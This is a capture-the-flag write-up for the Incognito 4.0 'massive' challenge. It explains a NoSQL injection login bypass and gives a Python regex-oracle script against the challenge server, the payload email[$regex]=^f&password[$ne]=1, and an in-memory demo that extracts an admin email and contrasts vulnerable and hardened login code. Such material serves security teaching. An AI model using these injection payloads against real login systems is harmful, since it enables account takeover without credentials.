• [Incognito 4.0] massive

    2023. 2. 19.

    by. hackintoanetwork

    In short, this CTF challenge could be solved with a NoSQL injection attack.

    The challenge provided a login and registration feature, as well as a functionality to check the existence of an email and whether an account had admin privileges.

    The ultimate goal of the challenge was to log in with an admin account, so I had to find an account with "isAdmin" set to true.


    Payload

    import string
    import requests
    
    # /checkUser acts as a boolean oracle: it reports whether a matching account exists
    # and whether that account is an admin. Passing the value under email[$regex] turns
    # the parameter into a {"$regex": "..."} operator object instead of a plain string.
    url = "http://143.42.131.80:1337/checkUser?email[$regex]=^"
    
    def find_isAdmin_true():
        # Probe one leading character at a time ("^" anchors the regex at the start of the
        # email) and stop at the first character for which an admin account matches.
        # Note: string.printable lists digits and letters before punctuation, so the hit on
        # "f" is found before regex metacharacters or URL-reserved characters (".", "*", "&",
        # "#", "%") are sent unescaped and could produce a false match or a broken request.
        payload = ""
        for i in string.printable:
            res = requests.get(url=url+i)
            if '{"exists":true,"isAdmin":true}' in res.text:
                payload = url+i
                print("[+] Payload : " + payload)
                break
    
    if __name__ == "__main__":
        find_isAdmin_true()
        
    # http://143.42.131.80:1337/checkUser?email[$regex]=^f

    To find such an account, I used the /checkUser endpoint as a NoSQL injection oracle: the script sends email[$regex]=^&lt;c&gt; for each printable character and stops at the first one for which the response reports both "exists" and "isAdmin" as true. It only recovers the first character of an admin email ("f"), but that is enough, because the login query below selects the account with the same regex rather than by its full address.


    Exploit

    email[$regex]=^f&password[$ne]=1
    • On the server this payload becomes the query { email: { $regex: "^f" }, password: { $ne: "1" } }: "^" anchors the regular expression at the start of the string, so the email must begin with the letter "f", and "$ne" ("not equal") accepts any password other than the string "1".

    Because no real password equals "1", the password condition is true for every document, so the query returns the admin account selected by the email regex and the login succeeds without knowing its password. That is the login bypass.
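    As an added, self-contained example (not code from the original post or from the challenge), the following Python script reconstructs both steps above against an in-memory stand-in for the server: it parses the email[$regex]=...&password[$ne]=... bracket syntax into operator objects the way the challenge server evidently does, evaluates them with a tiny $regex/$ne matcher, recovers the full admin email character by character instead of only its first letter, reproduces the $ne login bypass, and then shows a hardened login that refuses operator objects. The user records, the parse_query/find_one helpers, the safe_login function and the email alphabet are assumptions constructed for the demo.

```python
import re
import string
from urllib.parse import parse_qsl, quote

# Constructed stand-in for the challenge's user collection (not real challenge data).
USERS = [
    {"email": "alice@example.com", "password": "hunter2", "isAdmin": False},
    {"email": "flagkeeper@example.com", "password": "s3cr3t", "isAdmin": True},
]


def parse_query(query_string):
    """Turn 'email[$regex]=^f&password[$ne]=1' into
    {'email': {'$regex': '^f'}, 'password': {'$ne': '1'}}.
    This mirrors the bracket-to-object parsing the challenge server must do
    for the payloads above to work (assumption: one level of nesting)."""
    parsed = {}
    for key, value in parse_qsl(query_string, keep_blank_values=True):
        match = re.fullmatch(r"(\w+)\[(\$\w+)\]", key)
        if match:
            parsed.setdefault(match.group(1), {})[match.group(2)] = value
        else:
            parsed[key] = value
    return parsed


def field_matches(condition, actual):
    """Minimal MongoDB-style matcher: plain equality, $regex and $ne only."""
    if not isinstance(condition, dict):
        return condition == actual
    for operator, argument in condition.items():
        if operator == "$regex":
            if re.search(argument, actual) is None:
                return False
        elif operator == "$ne":
            if actual == argument:
                return False
        else:
            raise ValueError("unsupported operator: " + operator)
    return True


def find_one(query):
    """Return the first user document matching every field condition, like findOne()."""
    for doc in USERS:
        if all(field_matches(cond, doc.get(field)) for field, cond in query.items()):
            return doc
    return None


def check_user(query_string):
    """Vulnerable /checkUser: the parsed parameters go straight into the query."""
    doc = find_one(parse_query(query_string))
    return {"exists": doc is not None, "isAdmin": bool(doc and doc["isAdmin"])}


def login(query_string):
    """Vulnerable login: {email: <input>, password: <input>} with operators allowed."""
    return find_one(parse_query(query_string))


def safe_login(query_string):
    """Hardened login: only plain strings reach the query, so $regex/$ne are rejected."""
    params = parse_query(query_string)
    email, password = params.get("email"), params.get("password")
    if not isinstance(email, str) or not isinstance(password, str):
        return None
    return find_one({"email": email, "password": password})


# Assumed email alphabet for the extraction; extend it if the target uses more characters.
ALPHABET = string.ascii_lowercase + string.digits + "@._-"


def extract_admin_email(oracle):
    """Boolean-based extraction over the checkUser oracle: grow the prefix one character
    at a time while the response still says exists=true and isAdmin=true. Regex
    metacharacters are escaped and the pattern is URL-encoded, which the one-shot
    script above does not do."""
    prefix = ""
    while True:
        for ch in ALPHABET:
            pattern = "^" + re.escape(prefix + ch)
            reply = oracle("email[$regex]=" + quote(pattern, safe=""))
            if reply["exists"] and reply["isAdmin"]:
                prefix += ch
                break
        else:
            return None  # no character extends the prefix: the alphabet is too small
        full = "^" + re.escape(prefix) + "$"
        if oracle("email[$regex]=" + quote(full, safe=""))["isAdmin"]:
            return prefix


if __name__ == "__main__":
    print("admin email:", extract_admin_email(check_user))
    print("bypass login:", login("email[$regex]=^f&password[$ne]=1"))
    print("hardened login:", safe_login("email[$regex]=^f&password[$ne]=1"))
```

    The hardening is deliberately minimal: any parameter that parsed into an object is rejected before it reaches the query, so no operator can be injected regardless of its name. If the backend is an Express/Mongo stack (which the bracket syntax suggests), the same effect is commonly obtained by coercing inputs to strings or by stripping keys that begin with "$" before building the query.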

    FLAG : ictf{m4ss_ass1gnm3nt_1s_d4ng3rou5_93ab21c8}
